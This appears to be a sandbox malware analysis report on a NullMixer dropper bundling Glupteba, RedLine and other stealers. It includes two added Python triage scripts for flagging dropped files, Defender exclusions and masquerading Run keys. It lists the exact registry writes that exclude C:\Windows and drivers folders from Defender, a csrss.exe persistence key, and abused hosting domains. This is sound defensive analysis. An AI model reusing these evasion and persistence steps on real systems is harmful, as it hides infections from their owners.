Malware Analysis Report

2024-11-13 19:30

Sample ID 241107-f11stavqex
Target 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be
SHA256 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be
Tags
fabookie glupteba metasploit nullmixer privateloader redline socelars media24n user01new aspackv2 backdoor defense_evasion discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be

Threat Level: Known bad

The file 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba metasploit nullmixer privateloader redline socelars media24n user01new aspackv2 backdoor defense_evasion discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan

Socelars

Metasploit family

Glupteba family

MetaSploit

NullMixer

Fabookie family

Detect Fabookie payload

RedLine

Windows security bypass

Glupteba payload

Socelars payload

Glupteba

Nullmixer family

Fabookie

Redline family

Socelars family

Privateloader family

PrivateLoader

RedLine payload

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

Loads dropped DLL

System Binary Proxy Execution: Odbcconf

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

ASPack v2.12-2.42

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Modifies Internet Explorer settings

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-07 05:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win7-20240903-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Each row below is a REG_DWORD named after the excluded path or process with data 0, which is how Defender stores an active exclusion, so every row is an exclusion added, not removed. The values live under HKLM, so Wed1095e8d3cef4ec773.exe was already running elevated (the detonation user is Admin). After these writes Defender no longer scans C:\Windows, C:\Windows\System32\drivers, C:\Windows\rss or the Temp staging directories, which covers every file dropped later in this detonation.
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ProudDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
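The paths in the Executes dropped EXE table encode how each file arrived: the 7zS078C18A6 directory is a 7-Zip SFX extraction dir, the is-XXXXX.tmp directories are Inno Setup staging dirs, and the Gparted directory receives a WinRAR self-extractor. The following is an added triage helper (not part of the sandbox report) that tags dropped-file paths by those artefacts and groups them by staging directory so the drop chain can be read off. The sample paths are copied from this report; the tag names and the classification rules are this example's own assumptions.

```python
"""Classify dropped files by the installer/packer artefact in their path and
group them by staging directory. Added example, not from the sandbox report."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumptions of this example: 7-Zip SFX extracts to %TEMP%\7zS<hex>; Inno Setup
# stages in %TEMP%\is-XXXXX.tmp and writes unins000.dat; the WinRAR SFX module
# creates __tmp_rar_sfx_access_check_<n> to probe that the target dir is writable.
SEVENZIP_STAGE = re.compile(r"\\7zS[0-9A-F]+\\", re.IGNORECASE)
INNO_STAGE = re.compile(r"\\is-[A-Z0-9]{5}\.tmp\\", re.IGNORECASE)
STAGE_DIR = re.compile(r"^(?P<stage>.*\\(?:7zS[0-9A-F]+|is-[A-Z0-9]{5}\.tmp))\\", re.IGNORECASE)
SYSTEM_SUBDIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
PROGRAM_FILES = ("c:\\program files\\", "c:\\program files (x86)\\")


def classify_path(path):
    """Return the sorted list of tags that apply to one dropped-file path."""
    p = path.lower()
    tags = set()
    if SEVENZIP_STAGE.search(p):
        tags.add("7zip-sfx-stage")
    if INNO_STAGE.search(p):
        tags.add("inno-setup-stage")
    if p.endswith("\\unins000.dat"):
        tags.add("inno-setup-uninstaller")
    if "__tmp_rar_sfx_access_check_" in p:
        tags.add("rar-sfx-probe")
    if "\\appdata\\local\\temp\\" in p:
        tags.add("temp-drop")
    if p.startswith(PROGRAM_FILES):
        tags.add("program-files-drop")
    if p.startswith("c:\\windows\\system32\\drivers\\"):
        tags.add("drivers-dir")           # kernel code, needs admin (Winmon.sys)
    elif p.startswith("c:\\windows\\") and not p.startswith(SYSTEM_SUBDIRS):
        tags.add("windows-root-subdir")   # e.g. C:\Windows\rss\csrss.exe
    return sorted(tags)


def group_by_stage(paths):
    """Map each staging directory to the distinct file names dropped into it."""
    groups = defaultdict(set)
    for path in paths:
        m = STAGE_DIR.match(path)
        stage = m.group("stage") if m else "(no staging dir)"
        groups[stage].add(PureWindowsPath(path).name)
    return {stage: sorted(names) for stage, names in groups.items()}


def summarize(paths):
    """Tag counts over distinct paths (the Executes table repeats re-launches)."""
    counts = defaultdict(int)
    for path in set(paths):
        for tag in classify_path(path):
            counts[tag] += 1
    return dict(counts)


# Paths copied from this report's Executes dropped EXE / Drops file tables.
SAMPLE_PATHS = [
    r"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe",
    r"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe",
    r"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe",   # re-launch
    r"C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE",
    r"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe",
    r"C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe",
    r"C:\Windows\rss\csrss.exe",
    r"C:\Windows\system32\drivers\Winmon.sys",
    r"C:\Program Files (x86)\Gparted\Build.sfx.exe",
    r"C:\Program Files (x86)\Gparted\Build.exe",
    r"C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259462750",
    r"C:\Program Files (x86)\Gparted\unins000.dat",
]

if __name__ == "__main__":
    for stage, names in group_by_stage(SAMPLE_PATHS).items():
        print(stage, names)
    print(summarize(SAMPLE_PATHS))
```

The windows-root-subdir tag is a prompt, not a verdict: it also catches the benign CbsPersist cab under C:\Windows\Logs, so review what it flags against the process that wrote it.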

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Binary Proxy Execution: Odbcconf

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcconf.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ProudDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ProudDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
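The registry rows under Windows security bypass, Windows security modification and Adds Run key to start application are the two writes a responder most wants pulled out of a sandbox log: Defender exclusions being planted, and a Run value that launches a file named like a Windows system process (csrss.exe) from a directory that is not System32. The following is an added triage script (not part of the sandbox report, not the sandbox's own code) that parses "Set value" rows in exactly the layout this page uses, rates each exclusion, and flags the masquerading Run key. The sample rows are copied from this report; the severity labels, the list of system-process names and the "broad exclusion" list are this example's own assumptions.

```python
"""Triage sandbox "Set value" registry rows for Defender exclusions and
masquerading Run keys. Added example, not part of the sandbox report."""
import json
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Row layout on this page: Set value (type) KEY = "VALUE" PROCESS N/A
ROW_RE = re.compile(r'^Set value \((?P<type>int|str)\) (?P<key>.+?) = (?P<value>".*") (?P<proc>.+?) N/A$')
EXCL_RE = re.compile(r'\\Windows Defender\\Exclusions\\(?P<kind>Paths|Processes|Extensions)\\(?P<target>.+)$', re.IGNORECASE)
RUN_RE = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\]+)$', re.IGNORECASE)

# Assumptions of this example: names that only belong in the system directories,
# exclusions that blind Defender to a whole tree, and user-writable profile markers.
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe",
                "svchost.exe", "winlogon.exe", "wininit.exe", "explorer.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
BROAD_EXCLUSIONS = (r"c:\windows", r"c:\windows\system32\drivers", r"c:\program files", r"c:\users")
TEMP_MARKERS = (r"\appdata\local\temp", r"\appdata\roaming")


@dataclass
class Finding:
    severity: str
    rule: str
    detail: str
    process: str


def parse_row(row):
    """Split one row into (key, value, writing process); None for other row kinds."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    value = m.group("value")
    try:
        value = json.loads(value)        # decodes "\"C:\\Windows\\rss\\csrss.exe\""
    except ValueError:
        value = value.strip('"')
    return m.group("key"), value, m.group("proc")


def image_from_command(command):
    """Executable path from a Run value, with or without quotes and arguments."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command.strip('"')
    return command.split(" ", 1)[0]


def is_masquerade(image):
    """System-process file name launched from outside System32/SysWOW64."""
    p = PureWindowsPath(image.strip('"'))
    return p.name.lower() in SYSTEM_NAMES and not str(p.parent).lower().startswith(SYSTEM_DIRS)


def rate_exclusion(kind, target):
    t = target.lower().rstrip("\\")
    if kind.lower() == "paths" and t in BROAD_EXCLUSIONS:
        return "critical", f"whole-tree Defender exclusion for {target}"
    if any(marker in t for marker in TEMP_MARKERS):
        return "high", f"Defender exclusion inside a user-writable profile dir: {target}"
    if kind.lower() == "processes" and t in SYSTEM_NAMES:
        return "high", f"process exclusion using a system binary name: {target}"
    return "medium", f"Defender {kind} exclusion added: {target}"


def triage(rows):
    findings = []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        key, value, proc = parsed
        m = EXCL_RE.search(key)
        if m:                              # data 0 under these keys = active exclusion
            severity, detail = rate_exclusion(m.group("kind"), m.group("target"))
            findings.append(Finding(severity, "defender-exclusion", detail, proc))
            continue
        m = RUN_RE.search(key)
        if m:
            image = image_from_command(value)
            if is_masquerade(image):
                findings.append(Finding("critical", "run-key-masquerade",
                                        f"Run value {m.group('name')} launches {image}", proc))
            else:
                findings.append(Finding("medium", "run-key", f"Run value {m.group('name')} -> {image}", proc))
    return findings


# Rows copied from this report (one MuiCache row and one Key created row as noise).
SAMPLE = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ProudDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\rss\csrss.exe N/A
'''
SAMPLE_ROWS = [line for line in SAMPLE.splitlines() if line.strip()]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.severity:<9}{f.rule:<20}{f.detail}")
```

The same two rules translate directly to live telemetry: Sysmon Event ID 13 (RegistryEvent value set) carries the same TargetObject, Details and Image fields as the columns above.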

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
